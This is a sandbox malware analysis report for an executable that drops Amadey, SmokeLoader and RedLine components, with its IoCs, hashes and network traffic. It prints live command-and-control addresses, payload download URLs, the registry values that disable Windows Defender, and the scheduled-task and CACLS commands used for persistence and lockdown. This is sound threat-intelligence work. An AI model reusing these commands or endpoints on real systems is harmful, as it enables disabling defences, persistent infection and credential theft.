Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
139s -
platform
windows10-1703_x64 -
resource
win10-20230703-en -
resource tags
arch:x64arch:x86image:win10-20230703-enlocale:en-usos:windows10-1703-x64system -
submitted
24/07/2023, 03:49 UTC
Static task
static1
Behavioral task
behavioral1
Sample
5331b7166f765f3c728d7f3fd3bb65f59f8bb8fc5d271fe72dc9a8eb10d9d57d.exe
Resource
win10-20230703-en
General
-
Target
5331b7166f765f3c728d7f3fd3bb65f59f8bb8fc5d271fe72dc9a8eb10d9d57d.exe
-
Size
514KB
-
MD5
b70ef7d90c4a78d472105343f81629a0
-
SHA1
255e6f13eaf77e402f41b8e2ba214617bee363ba
-
SHA256
5331b7166f765f3c728d7f3fd3bb65f59f8bb8fc5d271fe72dc9a8eb10d9d57d
-
SHA512
de38af109b2d6b1b7803260b0692c12f555c7db5014e76ddcd5756fe8a8a4dde57c42c310395786629a7c63fde2faa68eed06d8d1906a987b8df5fcb6332760a
-
SSDEEP
12288:VMr4y90G2UYtnxFwzJvMIRtzk3QymubYygh7AhcHW:NyU7wFqQyqh7AS2
Malware Config
Extracted
amadey
3.85
77.91.68.3/home/love/index.php
Extracted
smokeloader
2022
http://77.91.68.29/fks/
Extracted
redline
news
77.91.68.68:19071
-
auth_value
99ba2ffe8d72ebe9fdc7e758c94db148
Signatures
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/files/0x000700000001afd0-136.dat healer behavioral1/files/0x000700000001afd0-137.dat healer behavioral1/memory/4152-138-0x0000000000610000-0x000000000061A000-memory.dmp healer -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" a8921201.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" a8921201.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" a8921201.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" a8921201.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" a8921201.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Downloads MZ/PE file
-
Executes dropped EXE 10 IoCs
pid Process 3676 v5981270.exe 4164 v6182677.exe 4152 a8921201.exe 4684 b3063062.exe 1260 danke.exe 2212 c2693955.exe 3652 d2558179.exe 368 danke.exe 3816 danke.exe 4360 3176.exe -
Loads dropped DLL 3 IoCs
pid Process 4976 rundll32.exe 2260 msiexec.exe 2260 msiexec.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" a8921201.exe -
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" v5981270.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce v6182677.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" v6182677.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce 5331b7166f765f3c728d7f3fd3bb65f59f8bb8fc5d271fe72dc9a8eb10d9d57d.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 5331b7166f765f3c728d7f3fd3bb65f59f8bb8fc5d271fe72dc9a8eb10d9d57d.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce v5981270.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI c2693955.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI c2693955.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI c2693955.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4620 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4152 a8921201.exe 4152 a8921201.exe 2212 c2693955.exe 2212 c2693955.exe 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3276 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2212 c2693955.exe -
Suspicious use of AdjustPrivilegeToken 19 IoCs
description pid Process Token: SeDebugPrivilege 4152 a8921201.exe Token: SeShutdownPrivilege 3276 Process not Found Token: SeCreatePagefilePrivilege 3276 Process not Found Token: SeShutdownPrivilege 3276 Process not Found Token: SeCreatePagefilePrivilege 3276 Process not Found Token: SeShutdownPrivilege 3276 Process not Found Token: SeCreatePagefilePrivilege 3276 Process not Found Token: SeShutdownPrivilege 3276 Process not Found Token: SeCreatePagefilePrivilege 3276 Process not Found Token: SeShutdownPrivilege 3276 Process not Found Token: SeCreatePagefilePrivilege 3276 Process not Found Token: SeShutdownPrivilege 3276 Process not Found Token: SeCreatePagefilePrivilege 3276 Process not Found Token: SeShutdownPrivilege 3276 Process not Found Token: SeCreatePagefilePrivilege 3276 Process not Found Token: SeShutdownPrivilege 3276 Process not Found Token: SeCreatePagefilePrivilege 3276 Process not Found Token: SeShutdownPrivilege 3276 Process not Found Token: SeCreatePagefilePrivilege 3276 Process not Found -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4684 b3063062.exe -
Suspicious use of WriteProcessMemory 53 IoCs
description pid Process procid_target PID 4956 wrote to memory of 3676 4956 5331b7166f765f3c728d7f3fd3bb65f59f8bb8fc5d271fe72dc9a8eb10d9d57d.exe 70 PID 4956 wrote to memory of 3676 4956 5331b7166f765f3c728d7f3fd3bb65f59f8bb8fc5d271fe72dc9a8eb10d9d57d.exe 70 PID 4956 wrote to memory of 3676 4956 5331b7166f765f3c728d7f3fd3bb65f59f8bb8fc5d271fe72dc9a8eb10d9d57d.exe 70 PID 3676 wrote to memory of 4164 3676 v5981270.exe 71 PID 3676 wrote to memory of 4164 3676 v5981270.exe 71 PID 3676 wrote to memory of 4164 3676 v5981270.exe 71 PID 4164 wrote to memory of 4152 4164 v6182677.exe 72 PID 4164 wrote to memory of 4152 4164 v6182677.exe 72 PID 4164 wrote to memory of 4684 4164 v6182677.exe 73 PID 4164 wrote to memory of 4684 4164 v6182677.exe 73 PID 4164 wrote to memory of 4684 4164 v6182677.exe 73 PID 4684 wrote to memory of 1260 4684 b3063062.exe 74 PID 4684 wrote to memory of 1260 4684 b3063062.exe 74 PID 4684 wrote to memory of 1260 4684 b3063062.exe 74 PID 3676 wrote to memory of 2212 3676 v5981270.exe 75 PID 3676 wrote to memory of 2212 3676 v5981270.exe 75 PID 3676 wrote to memory of 2212 3676 v5981270.exe 75 PID 1260 wrote to memory of 4620 1260 danke.exe 76 PID 1260 wrote to memory of 4620 1260 danke.exe 76 PID 1260 wrote to memory of 4620 1260 danke.exe 76 PID 1260 wrote to memory of 2228 1260 danke.exe 78 PID 1260 wrote to memory of 2228 1260 danke.exe 78 PID 1260 wrote to memory of 2228 1260 danke.exe 78 PID 2228 wrote to memory of 1432 2228 cmd.exe 80 PID 2228 wrote to memory of 1432 2228 cmd.exe 80 PID 2228 wrote to memory of 1432 2228 cmd.exe 80 PID 2228 wrote to memory of 4860 2228 cmd.exe 81 PID 2228 wrote to memory of 4860 2228 cmd.exe 81 PID 2228 wrote to memory of 4860 2228 cmd.exe 81 PID 2228 wrote to memory of 4608 2228 cmd.exe 82 PID 2228 wrote to memory of 4608 2228 cmd.exe 82 PID 2228 wrote to memory of 4608 2228 cmd.exe 82 PID 2228 wrote to memory of 4404 2228 cmd.exe 83 PID 2228 wrote to memory of 4404 2228 cmd.exe 83 PID 2228 wrote to memory of 4404 2228 cmd.exe 83 PID 2228 wrote to memory of 888 2228 cmd.exe 84 PID 2228 wrote to memory of 888 2228 cmd.exe 84 PID 2228 wrote to memory of 888 2228 cmd.exe 84 PID 2228 wrote to memory of 3580 2228 cmd.exe 85 PID 2228 wrote to memory of 3580 2228 cmd.exe 85 PID 2228 wrote to memory of 3580 2228 cmd.exe 85 PID 4956 wrote to memory of 3652 4956 5331b7166f765f3c728d7f3fd3bb65f59f8bb8fc5d271fe72dc9a8eb10d9d57d.exe 86 PID 4956 wrote to memory of 3652 4956 5331b7166f765f3c728d7f3fd3bb65f59f8bb8fc5d271fe72dc9a8eb10d9d57d.exe 86 PID 4956 wrote to memory of 3652 4956 5331b7166f765f3c728d7f3fd3bb65f59f8bb8fc5d271fe72dc9a8eb10d9d57d.exe 86 PID 1260 wrote to memory of 4976 1260 danke.exe 88 PID 1260 wrote to memory of 4976 1260 danke.exe 88 PID 1260 wrote to memory of 4976 1260 danke.exe 88 PID 3276 wrote to memory of 4360 3276 Process not Found 91 PID 3276 wrote to memory of 4360 3276 Process not Found 91 PID 3276 wrote to memory of 4360 3276 Process not Found 91 PID 4360 wrote to memory of 2260 4360 3176.exe 92 PID 4360 wrote to memory of 2260 4360 3176.exe 92 PID 4360 wrote to memory of 2260 4360 3176.exe 92
Processes
-
C:\Users\Admin\AppData\Local\Temp\5331b7166f765f3c728d7f3fd3bb65f59f8bb8fc5d271fe72dc9a8eb10d9d57d.exe"C:\Users\Admin\AppData\Local\Temp\5331b7166f765f3c728d7f3fd3bb65f59f8bb8fc5d271fe72dc9a8eb10d9d57d.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4956 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5981270.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5981270.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3676 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v6182677.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v6182677.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4164 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a8921201.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a8921201.exe4⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4152
-
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b3063062.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b3063062.exe4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4684 -
C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe"C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1260 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe" /F6⤵
- Creates scheduled task(s)
PID:4620
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "danke.exe" /P "Admin:N"&&CACLS "danke.exe" /P "Admin:R" /E&&echo Y|CACLS "..\3ec1f323b5" /P "Admin:N"&&CACLS "..\3ec1f323b5" /P "Admin:R" /E&&Exit6⤵
- Suspicious use of WriteProcessMemory
PID:2228 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵PID:1432
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "danke.exe" /P "Admin:N"7⤵PID:4860
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "danke.exe" /P "Admin:R" /E7⤵PID:4608
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵PID:4404
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\3ec1f323b5" /P "Admin:N"7⤵PID:888
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\3ec1f323b5" /P "Admin:R" /E7⤵PID:3580
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main6⤵
- Loads dropped DLL
PID:4976
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\c2693955.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\c2693955.exe3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2212
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\d2558179.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\d2558179.exe2⤵
- Executes dropped EXE
PID:3652
-
-
C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exeC:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe1⤵
- Executes dropped EXE
PID:368
-
C:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exeC:\Users\Admin\AppData\Local\Temp\3ec1f323b5\danke.exe1⤵
- Executes dropped EXE
PID:3816
-
C:\Users\Admin\AppData\Local\Temp\3176.exeC:\Users\Admin\AppData\Local\Temp\3176.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4360 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" -y .\_E62LIn4.O2⤵
- Loads dropped DLL
PID:2260
-
Network
-
Remote address:77.91.68.3:80RequestPOST /home/love/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.68.3
Content-Length: 89
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 6
Content-Type: text/html; charset=UTF-8
-
Remote address:8.8.8.8:53Request3.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request3.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request3.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://dfbjltwfka.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 353
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 7
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://qsvufwhly.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 215
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 47
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:8.8.8.8:53Request29.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request29.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request29.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://gwpoer.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 194
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 47
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:77.91.68.3:80RequestGET /home/love/Plugins/cred64.dll HTTP/1.1
Host: 77.91.68.3
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 272
Content-Type: text/html; charset=iso-8859-1
-
Remote address:77.91.68.3:80RequestGET /home/love/Plugins/clip64.dll HTTP/1.1
Host: 77.91.68.3
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Thu, 06 Jul 2023 18:47:56 GMT
ETag: "16400-5ffd5f45b7dbc"
Accept-Ranges: bytes
Content-Length: 91136
Content-Type: application/x-msdos-program
-
Remote address:8.8.8.8:53Request43.229.111.52.in-addr.arpaIN PTRResponse
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://erufd.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 186
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 43
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://eejdilky.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 116
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 45
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://cqurpfy.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 195
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:77.91.68.30:80RequestGET /fuzz/raman.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 77.91.68.30
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sun, 23 Jul 2023 22:23:36 GMT
ETag: "18f6ea-6012ef2ecea00"
Accept-Ranges: bytes
Content-Length: 1636074
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
-
Remote address:8.8.8.8:53Request38.148.119.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request30.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request30.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request30.68.91.77.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request58.189.79.40.in-addr.arpaIN PTRResponse
-
322 B 7
-
322 B 7
-
515 B 365 B 6 5
HTTP Request
POST http://77.91.68.3/home/love/index.phpHTTP Response
200 -
46 B 1
-
156 B 3
-
1.5kB 846 B 9 9
HTTP Request
POST http://77.91.68.29/fks/HTTP Response
404HTTP Request
POST http://77.91.68.29/fks/HTTP Response
404 -
156 B 3
-
156 B 3
-
776 B 510 B 7 6
HTTP Request
POST http://77.91.68.29/fks/HTTP Response
404 -
156 B 3
-
3.7kB 94.8kB 75 74
HTTP Request
GET http://77.91.68.3/home/love/Plugins/cred64.dllHTTP Response
404HTTP Request
GET http://77.91.68.3/home/love/Plugins/clip64.dllHTTP Response
200 -
156 B 3
-
767 B 506 B 7 6
HTTP Request
POST http://77.91.68.29/fks/HTTP Response
404 -
156 B 3
-
1.3kB 1.2kB 10 9
HTTP Request
POST http://77.91.68.29/fks/HTTP Response
404HTTP Request
POST http://77.91.68.29/fks/HTTP Response
404 -
53.9kB 1.7MB 1063 1212
HTTP Request
GET http://77.91.68.30/fuzz/raman.exeHTTP Response
200 -
156 B 3
-
156 B 3
-
207 B 207 B 3 3
DNS Request
3.68.91.77.in-addr.arpa
DNS Request
3.68.91.77.in-addr.arpa
DNS Request
3.68.91.77.in-addr.arpa
-
210 B 210 B 3 3
DNS Request
29.68.91.77.in-addr.arpa
DNS Request
29.68.91.77.in-addr.arpa
DNS Request
29.68.91.77.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
43.229.111.52.in-addr.arpa
-
72 B 146 B 1 1
DNS Request
38.148.119.40.in-addr.arpa
-
210 B 210 B 3 3
DNS Request
30.68.91.77.in-addr.arpa
DNS Request
30.68.91.77.in-addr.arpa
DNS Request
30.68.91.77.in-addr.arpa
-
71 B 145 B 1 1
DNS Request
58.189.79.40.in-addr.arpa
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.6MB
MD5436c574c5b11a763dd96c83bca8bb4b3
SHA13d0bca0898cb7cb43c93f5b1a24b3a099f760891
SHA256a4996fca522880b7495304b8b0959c56b71dd62e42d8dfd2001e73bcb5023499
SHA512bfbc35d14d682018608f30f874c71608cb1ffd0077e4445ced049344e359ab1d2a114013c2bb7c49a32982a9cffdba4667646e45a1ec7fbafead221fb9d84144
-
Filesize
1.6MB
MD5436c574c5b11a763dd96c83bca8bb4b3
SHA13d0bca0898cb7cb43c93f5b1a24b3a099f760891
SHA256a4996fca522880b7495304b8b0959c56b71dd62e42d8dfd2001e73bcb5023499
SHA512bfbc35d14d682018608f30f874c71608cb1ffd0077e4445ced049344e359ab1d2a114013c2bb7c49a32982a9cffdba4667646e45a1ec7fbafead221fb9d84144
-
Filesize
230KB
MD5cecba7b14426297083c6c1de6de21d28
SHA14efc38c40ed9d36ce85dba630825a4cc5493e648
SHA2562cc63e89286a246c25f48e174c3fba0832597301a37bd5a777cbbe8e8e8f8fda
SHA512a0ff458b9f79efeed3fbbea76b866a94e41b2ca8a6e1f8d03bed752357b1b888dcc1d86ceee77c18e997d9df942c62eb34670701bb4087a6a14fdffc6847d4e5
-
Filesize
230KB
MD5cecba7b14426297083c6c1de6de21d28
SHA14efc38c40ed9d36ce85dba630825a4cc5493e648
SHA2562cc63e89286a246c25f48e174c3fba0832597301a37bd5a777cbbe8e8e8f8fda
SHA512a0ff458b9f79efeed3fbbea76b866a94e41b2ca8a6e1f8d03bed752357b1b888dcc1d86ceee77c18e997d9df942c62eb34670701bb4087a6a14fdffc6847d4e5
-
Filesize
230KB
MD5cecba7b14426297083c6c1de6de21d28
SHA14efc38c40ed9d36ce85dba630825a4cc5493e648
SHA2562cc63e89286a246c25f48e174c3fba0832597301a37bd5a777cbbe8e8e8f8fda
SHA512a0ff458b9f79efeed3fbbea76b866a94e41b2ca8a6e1f8d03bed752357b1b888dcc1d86ceee77c18e997d9df942c62eb34670701bb4087a6a14fdffc6847d4e5
-
Filesize
230KB
MD5cecba7b14426297083c6c1de6de21d28
SHA14efc38c40ed9d36ce85dba630825a4cc5493e648
SHA2562cc63e89286a246c25f48e174c3fba0832597301a37bd5a777cbbe8e8e8f8fda
SHA512a0ff458b9f79efeed3fbbea76b866a94e41b2ca8a6e1f8d03bed752357b1b888dcc1d86ceee77c18e997d9df942c62eb34670701bb4087a6a14fdffc6847d4e5
-
Filesize
230KB
MD5cecba7b14426297083c6c1de6de21d28
SHA14efc38c40ed9d36ce85dba630825a4cc5493e648
SHA2562cc63e89286a246c25f48e174c3fba0832597301a37bd5a777cbbe8e8e8f8fda
SHA512a0ff458b9f79efeed3fbbea76b866a94e41b2ca8a6e1f8d03bed752357b1b888dcc1d86ceee77c18e997d9df942c62eb34670701bb4087a6a14fdffc6847d4e5
-
Filesize
174KB
MD5db9010e314218bdead9c1b0ce5bbd987
SHA1b7d1a71f562640e2011031a32f78e6306960a2a7
SHA256cbceda1d0f7793659763e809e1424a628cdfc7ace4ce26e9d379e46ee69ef4d9
SHA512fc276a357c4f17574aa6acc2b039ba60ac7cc77bd24d12619bef22bee81632a7c2d256e3fd72771f27d23f0a3ca2eb6b69dd6f6afd18f750ef2ff99d8a636857
-
Filesize
174KB
MD5db9010e314218bdead9c1b0ce5bbd987
SHA1b7d1a71f562640e2011031a32f78e6306960a2a7
SHA256cbceda1d0f7793659763e809e1424a628cdfc7ace4ce26e9d379e46ee69ef4d9
SHA512fc276a357c4f17574aa6acc2b039ba60ac7cc77bd24d12619bef22bee81632a7c2d256e3fd72771f27d23f0a3ca2eb6b69dd6f6afd18f750ef2ff99d8a636857
-
Filesize
359KB
MD51e8742031478cd2e17aecab940f6c3f0
SHA18d73f430b75cf0a7687650ab813e61da627b8741
SHA2562ef7d85678cb5eb483827f89ad1126d24248a576b3861566bb117b4698d44167
SHA512e8b7a4ec2299c62617d320422c1929ab5589c1791bce532f2a749188096b4fe5829ab40d31dd057a196d12b413ea6e959859a84e702bafdfa65f848881b60171
-
Filesize
359KB
MD51e8742031478cd2e17aecab940f6c3f0
SHA18d73f430b75cf0a7687650ab813e61da627b8741
SHA2562ef7d85678cb5eb483827f89ad1126d24248a576b3861566bb117b4698d44167
SHA512e8b7a4ec2299c62617d320422c1929ab5589c1791bce532f2a749188096b4fe5829ab40d31dd057a196d12b413ea6e959859a84e702bafdfa65f848881b60171
-
Filesize
34KB
MD5319bbe8ad367eef2ebbe000240b59ea7
SHA14852a8999a131266f89740818e7b171b32bfc761
SHA2560cfac26fd087d4fee334d0d5ad792bf5d82fad515d33cf8c620b6a8c7f7bb60b
SHA5121e872a8f2a24f3f6a061b5e82e2a04f2c52e925c6edc866910b4f10b824d7a484c711da3d43fcef902decfc58c6ad628c104fe79699c4ddf8512baef2f8e0458
-
Filesize
34KB
MD5319bbe8ad367eef2ebbe000240b59ea7
SHA14852a8999a131266f89740818e7b171b32bfc761
SHA2560cfac26fd087d4fee334d0d5ad792bf5d82fad515d33cf8c620b6a8c7f7bb60b
SHA5121e872a8f2a24f3f6a061b5e82e2a04f2c52e925c6edc866910b4f10b824d7a484c711da3d43fcef902decfc58c6ad628c104fe79699c4ddf8512baef2f8e0458
-
Filesize
235KB
MD522234fa0ee901e90eb2321c288d4ccbd
SHA18c01b4a2aeb7e6d15302d80f2168e264d9267aaa
SHA25606426ef2203c2b11275787fc2fb764918a3eb98a4ab8eda090ad82140289f8ef
SHA5122e2893bf632bb2415a3aaa47f6fa355f32990e8083a23d535bc02bf0615480a7bb8e2ab319bc1089d5f56b76d55e99e3a04ee43150edbfbe07172b06ebf886b5
-
Filesize
235KB
MD522234fa0ee901e90eb2321c288d4ccbd
SHA18c01b4a2aeb7e6d15302d80f2168e264d9267aaa
SHA25606426ef2203c2b11275787fc2fb764918a3eb98a4ab8eda090ad82140289f8ef
